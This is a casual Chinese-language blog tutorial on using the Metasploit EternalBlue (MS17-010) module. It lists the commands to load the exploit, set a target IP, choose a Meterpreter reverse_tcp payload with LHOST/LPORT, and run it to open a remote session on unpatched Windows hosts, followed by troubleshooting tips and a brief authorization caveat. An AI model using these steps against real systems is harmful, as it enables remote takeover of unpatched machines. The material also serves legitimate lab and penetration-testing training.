永恒之蓝怎么安装?手把手教你避开那些坑,别慌!
哎,说到“永恒之蓝”,我猜你八成是冲着MS17-010这个漏洞工具来的吧?说实话,我第一次听说这玩意儿的时候,心里也是七上八下的,毕竟这名字听着就挺吓人的,别怕,今天我就用大白话,把我自己折腾半天才搞明白的安装过程,原原本本讲给你听,保证你少走弯路。

首先啊,咱得把丑话说在前头——永恒之蓝可不是什么“一键安装”的傻瓜软件,它本质上是一堆利用Windows SMB漏洞的脚本和Payload组合,你要是以为下载个exe双击就能跑,那我劝你趁早打消这个念头,哈哈,不然你可能会对着黑窗口怀疑人生。
那到底该怎么装呢? 第一步,你得先有个Kali Linux系统,或者任何带Metasploit框架的Linux环境,没装Kali?那就先去VMware里装一个呗,这过程我都能写篇小作文了,但今天先聚焦主题,装好之后,打开终端,输入msfconsole,看到那个banner慢慢蹦出来的时候,我心里那块石头才算落地,你懂那种感觉吧?终于有点眉目了”的踏实感。
关键来了!永恒之蓝的“安装”实际上是加载模块,在msfconsole里,你输入:
search ms17-010
哎哟,这时候屏幕上会蹦出来好几个结果,什么exploit/multi/samba/ms17_010_eternalblue,还有auxiliary/scanner/smb/ms17_010那个扫描器,我当时就懵了,到底选哪个?别急,我告诉你——用exploit那个,看到名字里有“eternalblue”就对了。
然后输入:
use exploit/windows/smb/ms17_010_eternalblue
看到提示符变成msf6 exploit(windows/smb/ms17_010_eternalblue) >,嘿,这就算“装”上了!是不是感觉有点绕?其实说白了,这步就是告诉Metasploit:“嘿,哥们儿,我要用这个武器了。” 接下来得设置目标IP,用set RHOSTS 192.168.x.x,然后设置Payload,比如set payload windows/x64/meterpreter/reverse_tcp,再设个set LHOST 你的IP和set LPORT 4444。
说实话,我第一次设置完这些参数,手心都在冒汗,生怕漏了一步,然后输入run,看着屏幕滚动,那心跳声比键盘声还响,如果顺利,你会看到Meterpreter session 1 opened——那一刻,我差点从椅子上蹦起来,简直比中彩票还开心!
不过呢,我得提醒你,永恒之蓝的“安装”过程有很多前置条件,比如目标机器得开放445端口,而且没打补丁(MS17-010补丁是2017年3月发布的,老系统基本都中招),要是你扫了半天都没反应,八成是目标机已经免疫了,别傻乎乎地硬试,换个靶机或者去虚拟机里自己搭个Win7试试看。
还有啊,别忘了防火墙!我那次就是忘了关自己的防火墙,结果session刚建立就断了,气得我直拍大腿,检查一下你的Linux防火墙,还有目标的防火墙是否放行,哦对了,Windows 7 SP1是永恒之蓝最爱的“猎物”,但如果你是Windows 10,还是省省吧,人家早修了。
我再啰嗦一句——这玩意儿装起来不难,难的是怎么用对,如果你是搞安全测试的,请务必在授权范围内使用,别一时手痒拿它去搞同学的电脑,不然我可救不了你,哈哈,好了,我的血泪史就讲到这儿,祝你一次成功!如果卡在哪一步,欢迎回来留言,我看到就回复你,加油!